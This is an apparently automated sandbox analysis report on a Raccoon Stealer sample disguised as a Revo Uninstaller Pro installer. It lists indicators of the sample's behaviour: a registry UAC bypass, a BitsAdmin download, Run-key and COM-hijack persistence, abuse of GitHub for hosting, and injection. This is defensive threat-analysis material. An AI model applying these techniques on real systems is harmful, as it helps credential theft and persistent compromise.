Malware Analysis Report

2024-10-19 09:14

Sample ID: 241002-r9dkeswbjd
Target: 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118
SHA256: 2eeae1c74dff19b7538522acd75a4c9e0d369cec323d4837bdfbc00b8fc81799
Tags: raccoon 0343d4da493d263f78921a8724ca6adf05347cfe discovery dropper evasion execution persistence privilege_escalation stealer trojan
Score: 10/10

Analysis Overview

Score: 10/10

SHA256: 2eeae1c74dff19b7538522acd75a4c9e0d369cec323d4837bdfbc00b8fc81799

Threat Level: Known bad

The file 0b3937c39ea113c3352090ac5ce26103_JaffaCakes118 was found to be: Known bad.

Malicious Activity Summary

Raccoon Stealer V1 payload

UAC bypass

Raccoon

Command and Scripting Interpreter: PowerShell

Download via BitsAdmin

Drops file in Drivers directory

Modifies Windows Firewall

Executes dropped EXE

Event Triggered Execution: Component Object Model Hijacking

Loads dropped DLL

Checks computer location settings

Modifies system executable filetype association

Checks installed software on the system

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

System Location Discovery: System Language Discovery

Event Triggered Execution: Netsh Helper DLL

Suspicious use of WriteProcessMemory

Suspicious use of SetWindowsHookEx

Modifies system certificate store

Suspicious use of SendNotifyMessage

Checks processor information in registry

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Delays execution with timeout.exe

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-10-02 14:53

Signatures

Unsigned PE

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A

Analysis: behavioral2

Detonation Overview

Submitted: 2024-10-02 14:53

Reported: 2024-10-02 14:55

Platform: win10v2004-20240802-en

Max time kernel: 147s

Max time network: 148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe"

Signatures

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Download via BitsAdmin

dropper
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\bitsadmin.exe | N/A

Drops file in Drivers directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\system32\DRIVERS\SETC573.tmp | C:\Windows\system32\rundll32.exe | N/A
File created | C:\Windows\system32\DRIVERS\SETC573.tmp | C:\Windows\system32\rundll32.exe | N/A
File opened for modification | C:\Windows\system32\DRIVERS\revoflt.sys | C:\Windows\system32\rundll32.exe | N/A

Modifies Windows Firewall

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Modifies system executable filetype association

persistence
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt | C:\Windows\system32\regsvr32.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" | C:\Windows\system32\regsvr32.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt | C:\Windows\system32\regsvr32.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" | C:\Windows\system32\regsvr32.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\GrpConv = "grpconv -o" | C:\Windows\system32\rundll32.exe | N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description | Indicator | Process | Target
N/A | raw.githubusercontent.com | N/A | N/A
N/A | raw.githubusercontent.com | N/A | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 4612 set thread context of 2752 | N/A | C:\ProgramData\uzlyLtM20yixSdV\111.exe | C:\ProgramData\uzlyLtM20yixSdV\111.exe

Drops file in Program Files directory

Description | Indicator | Process | Target
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SQ2IF.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-2SAH8.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-M285L.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-BH5TN.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-E8NN8.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-98A4K.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-TMR6O.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-PIF2G.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exe | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-QTSI6.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-T6OE0.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-HESS8.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1CO13.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-I4R82.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-KF950.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1DEPE.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8EBPQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-B842V.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-0CNGL.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-DBS9F.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-11D5K.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-A5EJO.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-I0JB7.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-MGU6R.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dll | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-GUGQ9.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7IFIE.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-JLN3A.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7OTPS.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-MRVBA.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-OOVS2.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-1OS3J.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-D5T18.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1AJUU.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-2BPEO.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-PSTB9.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7RJU1.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-DIHT4.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-NNFCT.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P30VC.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File opened for modification | C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe | C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-5SN49.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-KSQCR.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-D5QS7.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-8SAF9.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-L3SUU.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-86AVN.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-LO1UR.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-P9GR5.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files (x86)\is-H9BQU.tmp | C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp | N/A
File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File opened for modification | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exe | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-SHUNJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-5H27N.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-4JI7F.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-CFCOM.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-1ALQI.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-BMARA.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\is-PH91H.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-7MFPL.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
File created | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\is-00GEF.tmp | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A
Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A
Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\uzlyLtM20yixSdV\111.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\PROGRA~1\VSREVO~1\REVOUN~1\ruplp.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\uzlyLtM20yixSdV\111.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Revo Uninstaller Pro 4.2.3.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\bitsadmin.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mode.com | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-AC2M1.tmp\0b3937c39ea113c3352090ac5ce26103_JaffaCakes118.tmp | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\runonce.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\runonce.exe | N/A

Delays execution with timeout.exe

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A

Modifies registry class

Description | Indicator | Process | Target
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\InfoTip = "Uninstall, Remove Programs, Clear Web Browsers Tracks, Control Automatically Started Applications" | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel\shell\open\command | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\ContextMenuHandlers\RUShellExt\ = "{2C5515DC-2A7E-4BFD-B813-CACC2B685EB7}" | C:\Windows\system32\regsvr32.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ProxyStubClsid32 | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\ = "ILicProtectorEXE510" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{58DF91C9-795D-4356-9568-7F149ED299B4}\TypeLib | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\RevoUninstallerPro.ruel\shell | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\Version\ = "5.1" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\shell\open\command\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe /implog \"%1\"" | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Msi.Package\shellex\ContextMenuHandlers\RUShellExt | C:\Windows\system32\regsvr32.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\LicProtector.LicProtectorEXE510\Clsid | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{DD72B942-27D2-4A3C-9353-FA0441FBABA0}\ProgID\ = "LicProtector.LicProtectorEXE510" | C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\{305CA226-D286-468e-B848-2B2E8E697B74} 2 = "8" | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\RevoUninstallerPro.ruel\DefaultIcon\ = "C:\\Program Files\\VS Revo Group\\Revo Uninstaller Pro\\RevoUninPro.exe,0" | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Key created | \REGISTRY\MACHINE\Software\Classes\CLSID\{FB562550-BBE6-4298-861A-5C0A6562C272}\Shell\Open\command | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
Key created | \REGISTRY\MACHINE\Software\Classes\.ruel | C:\Users\Admin\AppData\Local\Temp\is-3CNGV.tmp\Revo Uninstaller Pro 4.2.3.tmp | N/A
